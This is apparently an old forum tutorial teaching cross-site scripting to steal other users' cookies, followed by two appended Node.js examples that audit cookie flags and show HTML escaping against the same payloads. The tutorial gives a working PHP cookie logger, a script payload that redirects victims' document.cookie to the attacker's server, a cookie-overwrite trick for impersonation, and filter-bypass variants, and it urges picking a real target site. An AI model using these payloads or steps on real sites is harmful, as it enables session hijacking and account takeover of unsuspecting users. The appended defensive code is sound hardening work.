I don't come around here very often, but I like the way this community is looking, so I may come back more often and write some more in-depth articles. Direct any questions you have about this article to RyanTheGreatt on AIM. I take no responsibility for what you do with this information; this article is for information purposes only.
1. Introduction

I noticed there was a link to another XSS article on this forum; however, I didn't like the way it was produced, since I saw very few specific examples and it wasn't very 'noob' friendly. XSS means cross-site scripting. It is a very popular and useful form of hacking; its popularity comes from its ease of use and the endless ways it can be applied.

2. PHP log

Let's start with a basic XSS example and explain how it works. For the purpose of this article, it is assumed you have access to a web server running PHP and a basic understanding of PHP and JavaScript. First, let's create a simple PHP script named log.php which will log stolen cookies for us:

<?php
// Read the cookie string passed in the URL (log.php?cookie=...)
$cookie = $_GET['cookie'];
// Open the log file in append mode
$file = fopen("cookies.txt", "a");
// Write the cookie on its own line; print "Error" if the write fails
if (fwrite($file, "$cookie \n") === FALSE) { echo "Error"; } else { echo ""; }
fclose($file);
?>

Okay, what this code will do is:
- Grab the supplied cookie information from the URL bar.
- Open a file on the web server used for logging cookies.
- Write the information to the file, and then close the file.
(You must have a file named cookies.txt on your web server. In my example cookies.txt is chmodded to 777.)

Okay, now you may be saying "Well, I've got it set up, but how do I get people's cookies?" What you need to do is find a target site... Don't pick a site like yahoo.com because you'll never get it to work. Pick a user-system based site which we will try to exploit.

3. Testing a site for vulnerabilities

Now that you've found your target site, look around the site for places where users can submit data. Once you have found an input field like that, try to inject a simple piece of JavaScript like this:

<script>alert('Testing')</script>

If this is successful, a message box with the text Testing will appear on the page the information is submitted to. This means the site is vulnerable to XSS. Although most sites will not allow the script tags, this is a basic form of testing. More advanced ways will be listed in section 6, Sneaky vulnerabilities.

4. Stealing the cookies
Okay, now we will be putting all the loose ends together. On the site where you injected the JavaScript alert, we will now inject some code to make the browser redirect to your cookie log page. The idea is to have OTHER users view the page on which your JavaScript redirection is located; they are then redirected to your site and their cookies are logged. The code you will need to inject is:

<script>window.location = "http://yourwebserver.com/log.php?cookie="+document.cookie</script>

This will redirect the user to http://yourwebserver.com/log.php and supply the user's cookie information to your logging script. Now, once you've redirected a user, all you need to do is visit http://yourwebserver.com/cookies.txt to view the stolen cookie.

5. Using the stolen cookies on the website

Now, return to the website you've stolen your cookies from. To change your cookie information to that of another user, all you have to do is type this into the URL bar and hit enter:

Javascript:void(document.cookie="variablename=theirinformation")

For this to work, you need to replace variablename with the name of the cookie value, such as password, and theirinformation with the information supplied in the stolen cookie. A sample input would be:

Javascript:void(document.cookie="password=admin")
This changes your current password cookie to the password of the user whose cookie you stole. Once you have set ALL the values this way, refresh the page and you will be logged in as that user.

6. Sneaky vulnerabilities

Now, since most sites of any interest will strip <script> tags, sometimes we need to get more creative. An interesting technique I use personally, which is surprisingly successful in most scripts, is an onmouseover injection. First, find a field which will be turned into a link at one point or another (a link to your personal webpage or something). Go to the page where the link is posted, such as your user profile. Next, view the source and find the link; in the source it will look like:

<a href="http://thelink.com">Link</a>
or
<a href='http://thelink.com'>Link</a>

The difference between the " and the ' must be noted. Now we're ready for the injection. Go to the form which submits the link and type:

http://thelink.com" onmouseover="alert('Testing');

Please note that this example refers to an href= using "; if the href= uses ', replace the quotes in the example where appropriate. Now go to the page and move your mouse over the link. Do you get an alert? If so, the page can be injected as I explained earlier.

Okay, now for a slightly less popular method. If you try to inject

<script>alert(document.cookie)</script>

and it echoes back as scriptalert(document.cookie)/script, try inputting:

<<script>>alert(document.cookie)<</script>>

This may be successful in some cases.

7. Conclusion

That's all for now, I will be back to write more articles.
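The redirect in section 4 only works because document.cookie hands the injected script every cookie that lacks the HttpOnly flag, and the trick in section 5 only works because the site stored the password itself in a cookie. As an added example that is not part of the original post, here is a small Node.js audit of Set-Cookie headers that reports which cookies an injected script could read or overwrite and which cookie values look like credentials. The header samples are constructed for the demonstration, and parseSetCookie, auditCookie and scriptVisibleCookies are names chosen here.

```javascript
// Added example, not from the original post: audit Set-Cookie headers for the
// properties the cookie theft in sections 4 and 5 depends on.
// Sample headers below are constructed for this demonstration.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are lower-cased; flag attributes (HttpOnly, Secure) map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq).trim();
  const value = eq === -1 ? '' : parts[0].slice(eq + 1).trim();
  const attrs = {};
  for (const p of parts.slice(1)) {
    if (!p) continue;
    const i = p.indexOf('=');
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return { name, value, attrs };
}

// document.cookie (and therefore any injected script) can read and overwrite a
// cookie unless it carries HttpOnly. Secure and SameSite do not stop the theft
// itself but limit where a stolen copy can be replayed from.
function auditCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attrs.httponly) findings.push('missing HttpOnly: readable and writable via document.cookie');
  if (!c.attrs.secure) findings.push('missing Secure: also sent over plain HTTP');
  if (!c.attrs.samesite) findings.push('missing SameSite: attached to cross-site requests');
  // Section 5 shows a site keeping the password itself in a cookie; the value
  // should be an opaque session id that can be revoked, never a credential.
  if (/^(pass|password|pwd|passwd)$/i.test(c.name)) findings.push('credential stored in cookie value');
  return { name: c.name, findings };
}

// The cookie names a document.cookie read inside an injected script would return.
function scriptVisibleCookies(headers) {
  return headers.map(parseSetCookie).filter((c) => !c.attrs.httponly).map((c) => c.name);
}

// Constructed sample headers: the weak settings beside the corrected one.
const SAMPLE_HEADERS = [
  'password=admin; Path=/',
  'PHPSESSID=constructed1; Path=/',
  'PHPSESSID=constructed2; Path=/; HttpOnly; Secure; SameSite=Lax',
];

// Run directly (node audit.js) to print the audit of the sample headers.
if (typeof require !== 'undefined' && require.main === module) {
  for (const h of SAMPLE_HEADERS) console.log(auditCookie(h));
  console.log('visible to document.cookie:', scriptVisibleCookies(SAMPLE_HEADERS));
}
```

With the first two sample headers the audit reports the session and password cookies as visible to document.cookie; the third, with HttpOnly set, is not returned by scriptVisibleCookies at all. In PHP the HttpOnly flag is set with session.cookie_httponly (or the httponly argument of setcookie), which removes the session cookie from what the section 4 payload can reach.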
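The probes in sections 3 and 6 all succeed for the same reason: the site writes user input into its HTML without encoding it for the place it lands, so a quote closes the href attribute early and an angle bracket opens a new tag. As an added example that is not part of the original post, here is a Node.js rendering of the profile link and comment from section 6, first as the vulnerable concatenation and then with context-aware escaping (the equivalent of PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8')), run against the three payloads the article uses. The template, the looksInjected check and the function names are constructed for this demonstration.

```javascript
// Added example, not from the original post: the vulnerable profile template
// from section 6 beside a hardened version, exercised with the article's payloads.
// Template and test inputs are constructed for this demonstration.

// Encode the characters that change meaning in HTML text and attribute values.
// Both quote styles are escaped, which is what makes the href=" versus href='
// distinction in section 6 irrelevant. PHP equivalent: htmlspecialchars($s, ENT_QUOTES, 'UTF-8').
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: raw concatenation, the behaviour the article exploits.
function renderProfileVulnerable(link, comment) {
  return '<a href="' + link + '">Link</a><p>' + comment + '</p>';
}

// Hardened rendering: every user-controlled value is escaped for its context.
function renderProfileHardened(link, comment) {
  return '<a href="' + escapeHtml(link) + '">Link</a><p>' + escapeHtml(comment) + '</p>';
}

// Demonstration-only check: did the user input manage to open a script tag, or
// to close a quoted attribute and start an event-handler attribute?
function looksInjected(html) {
  return /<\s*script/i.test(html) || /["']\s+on\w+\s*=/i.test(html);
}

// Constructed inputs mirroring the payloads from sections 3 and 6.
const PAYLOADS = {
  scriptTag: "<script>alert('Testing')</script>",
  doubledTags: '<<script>>alert(document.cookie)<</script>>',
  attrBreakout: 'http://thelink.com" onmouseover="alert(\'Testing\');',
};

// Render each payload through both templates and report, per payload, whether
// the injection survived. Expected: vulnerable true for all, hardened false for all.
function compareTemplates() {
  const results = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    results[name] = {
      vulnerable: looksInjected(renderProfileVulnerable(p, p)),
      hardened: looksInjected(renderProfileHardened(p, p)),
    };
  }
  return results;
}

// Run directly (node render.js) to see the comparison and one hardened output.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(compareTemplates());
  console.log(renderProfileHardened(PAYLOADS.attrBreakout, 'hello'));
}
```

Encoding rather than stripping is the point: a filter that removes the string script is what the doubled-tag variant in section 6 gets past, whereas escapeHtml leaves the input visible on the page as harmless text. Escaping alone does not police the scheme of the link; a real profile page should additionally allow-list http and https before the value reaches the href.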